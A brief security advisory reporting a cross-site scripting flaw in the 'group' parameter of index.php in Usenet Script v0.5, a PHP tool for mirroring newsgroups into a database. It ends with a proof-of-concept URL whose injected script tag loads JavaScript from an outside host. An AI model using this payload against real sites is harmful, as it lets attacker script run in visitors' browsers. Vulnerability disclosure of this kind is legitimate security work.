Usenet Script v0.5 suffers from cross site scripting in index.php
1ccc621b4089584ddd76df052fc4861b60845bbcc2632642bd2c35ce5cb5d1ff
Usenet Script v0.5
Homepage:
http://www.metalhead.ws/usenet
Description:
"Those scripts allow you to mirror a Newsgroup in an SQL database. The development database was Postgresql, but it uses dbx and should therefore be able to work with other database systems, too. Furthermore, a frontend is provided."
Affected files:
index.php
------------------------------------
XSS vuln via index.php on group var:
Data isnt properly sanatized before being generated.
http://www.example.com/index.php?group=<script src=http://www.youfucktard.com/xss.js></script>